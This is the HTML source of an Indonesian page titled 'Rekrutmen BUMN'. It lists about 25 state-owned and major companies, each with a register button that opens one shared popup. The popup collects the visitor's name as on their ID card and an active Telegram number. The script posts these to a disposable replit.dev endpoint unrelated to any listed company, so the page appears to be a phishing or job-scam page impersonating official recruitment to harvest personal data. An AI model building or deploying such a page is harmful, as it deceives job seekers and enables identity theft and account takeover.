<!DOCTYPE html>
<html lang="id">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Rekrutmen BUMN</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      background-color: #fff;
    }

    .header {
      padding: 10px;
      border-bottom: 1px solid #ccc;
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .logo {
      height: 70px;
    }

    .menu-icon {
      font-size: 30px;
      cursor: pointer;
    }
    
    .gambarutama {
      width: 100%;
      
    }

    .job-container {
      padding: 20px;
    }

    .job-card {
      display: flex;
      align-items: center;
      background-color: #f2f4f7;
      border-radius: 10px;
      padding: 10px;
      margin-bottom: 20px;
      box-shadow: 0 2px 4px rgba(0,0,0,0.1);
    }

    .job-image {
      flex: 1;
    }

    .job-image img {
      width: 80%;
      border-radius: 10px;
    }

    .job-button {
      margin-left: 20px;
    }

    .job-button button {
      background-color: #003366;
      color: white;
      padding: 12px 24px;
      font-size: 16px;
      font-weight: bold;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }

    /* Popup Styling */
    .popup {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0,0,0,0.5);
      display: none;
      justify-content: center;
      align-items: center;
      z-index: 999;
    }

    .popup-content {
      background: #003366;
      color: white;
      padding: 10px;
      border-radius: 20px;
      width: 90%;
      max-width: 400px;
      text-align: center;
      box-shadow: 0 4px 10px rgba(0,0,0,0.5);
    }

    .popup-content h2 {
      margin-bottom: 20px;
      font-size: 20px;
    }

    .popup-content input {
      width: 80%;
      padding: 10px;
      margin-bottom: 15px;
      border: none;
      border-radius: 20px;
      font-size: 14px;
    }

    .popup-content button {
      background-color: #fff;
      color: #003366;
      font-weight: bold;
      padding: 10px 20px;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }

    .close-popup{
      margin-top: 10px;
      display: inline-block;
      color: #ccc;
      font-size: 10px;
      cursor: pointer;
   
    }
  </style>
</head>
<body>

  <div class="header">
    <img src="images/logoatas.png" alt="Logo BUMN" class="logo">
    <div class="menu-icon">&#9776;</div>
  </div>
  
  <div class="gambarutama">
    <img src="images/header.png" alt="Logo BUMN" class="gambarutama">
  
  <div class="job-container">
    <div class="job-card">
      <div class="job-image">
        <img src="images/freeport.jpg" alt="PT Freeport Indonesia">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>

    <div class="job-card">
      <div class="job-image">
        <img src="images/vale.jpg" alt="PT Vale Indonesia Tbk">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>

    <div class="job-card">
      <div class="job-image">
        <img src="images/mindid.jpg" alt="PT Mineral Industri Indonesia (Persero) ">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/garuda.jpg" alt="Garuda Indonesia (Persero) Tbk">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/peruri.jpg" alt="PERURI">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/pertaminapdc.jpg" alt="PT Patra Drilling Contractor (Pertamina PDC)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/mandiri.jpg" alt="PT Bank Mandiri(Persero) Tbk">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/pegadaian.jpg" alt="PT Pegadaian">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/bankraya.jpg" alt="PT Bank Raya Indonesia Tbk">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/pupuk.jpg" alt="PT Pupuk Indonesia (Persero)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/ihc.jpg" alt="PT IHC RS Pertamina Balongan">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/perkasa.jpg" alt="PT Permata Karya Jasa (PGN Group)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/pln.jpg" alt="PT Paguntuka Cahaya Nusantara (PLN Group)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/kimiafarma.jpg" alt="PT Kimia Farma Diagnostika (KFD)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/gdps.jpg" alt="PT Garuda Daya Pratama Sejahtera">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/pertamina2.jpg" alt="PT PERTAMINA Port and Logistic">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/recare.jpg" alt="PT Rekayasa Cakrawala Resources (RECARE)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/semen.jpg" alt="PT Semen Gersik">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/forex.jpg" alt="PT Kliring Berjangka (Persero)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/bni.jpg" alt="PT Bank Negara Indonesia (Persero) Tbk">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/bni2.jpg" alt="PT BNI Sekuritas">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/mandiri2.jpg" alt="PT Bank Mandiri (Persero) Tbk">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/pelindo.jpg" alt="PT Pelabuhan Indonesia (Persero)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
    <div class="job-card">
      <div class="job-image">
        <img src="images/kimiafarma2.jpg" alt="PT Kimia Farma Tbk (KFHO)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>

    <div class="job-card">
      <div class="job-image">
        <img src="images/madani.jpg" alt="PT Permodalan Nasional Madani (PNM)">
      </div>
      <div class="job-button">
        <button onclick="openPopup()">DAFTAR</button>
      </div>
    </div>
    
  </div>

  <!-- Popup Form -->
  <div class="popup" id="popupForm">
<div class="popup-content">
  <img src="images/popuplogobumn.png" alt="BUMN" width="250" style="margin-bottom:10px;">
  <form id="registerForm" onsubmit="submitForm(event)">
    <input type="text" name="nama" placeholder="NAMA SESUAI KTP" required />
    <input type="tel" name="telepon" placeholder="NO. TELEGRAM AKTIF" required />
    <button type="submit">DAFTAR</button>
  </form>
  <div class="close-popup" onclick="closePopup()">TUTUP</div>
</div>

 <div class="gambarutama">
    <img src="images/header.png" alt="Logo BUMN" class="gambarutama">
 
<script>
  function openPopup() {
    document.getElementById('popupForm').style.display = 'flex';
  }

  function closePopup() {
    document.getElementById('popupForm').style.display = 'none';
  }

  function submitForm(event) {
    event.preventDefault();
    const form = document.getElementById("registerForm");
    const nama = form.nama.value.trim();
    const telepon = form.telepon.value.trim();

    if (!nama || !telepon) {
      alert("Mohon isi semua data.");
      return;
    }
   fetch("https://db3b973a-9ce6-4086-8d05-f3b2b6be3315-00-3r5je91lmngmj.sisko.replit.dev/api/daftar", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ nama, telepon })
   })

  
    .then(res => {
      if (!res.ok) throw new Error("Gagal mendaftar");
      return res.json();
    })
    .then(data => {
      alert("Pendaftaran berhasil!");
      form.reset();
      closePopup();
    })
    .catch(err => {
      alert("Terjadi kesalahan saat mengirim data.");
      console.error(err);
    });
  }
</script>

</body>
</html>
